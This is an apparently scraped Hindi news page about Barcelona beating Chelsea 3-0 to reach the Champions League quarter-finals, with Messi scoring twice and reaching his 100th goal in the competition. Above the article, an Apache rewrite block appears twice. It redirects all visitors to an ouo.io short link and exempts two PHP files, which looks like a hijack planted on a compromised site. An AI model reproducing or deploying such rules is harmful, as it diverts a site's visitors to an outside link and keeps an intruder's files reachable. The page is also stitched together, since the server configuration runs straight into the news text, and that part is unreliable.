
RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]
BREAKING NEWS
Total views:- 536
Nextबार्सिलोना। लियोनेल मेसी द्वारा किए गए दो गोल के दम पर बार्सिलोना ने चेल्सी को मात देकर चैम्पियंस लीग क्वार्टर फाइनल में प्रवेश कर लिया है। एजेंसी से प्राप्त समाचार के अनुसार बार्सिलोना ने कल रात खेले गए इस मैच में चेल्सी को 3-0 से मात दी। इससे पहले, चैम्पियंस लीग अंतिम-16 दौर के पहले चरण में बार्सिलोना और चेल्सी का मैच 1-1 से ड्रॉ रहा था। ऐसे में दोनों मैचों के औसतन परिणाम के तहत बार्सिलोना ने 4-1 से जीत हासिल कर अंतिम-8 में प्रवेश किया है। मेसी ने तीसरे मिनट में ही गोल कर बार्सिलोना को अच्छी शुरुआत दी। इसके बाद, ओउस माने डेम्ब्ले ने गोल कर टीम को 2-0 से आगे कर दिया। दूसरे हाफ में भी बार्सिलोना ने मैच पर अपना दबदबा बनाए रखा। 63वें मिनट में मेसी ने दूसरा गोल दागकर चेल्सी के खिलाफ बार्सिलोना को 3-0 से जीत दिलाई। अर्जेटीना के स्टार खिलाड़ी मेसी का चैम्पियंस लीग में यह 100वां गोल था। बार्सिलोना ने इसके साथ ही लगातार 11वीं बार चैम्पियंस लीग क्वार्टर फाइनल में प्रवेश कर लिया है।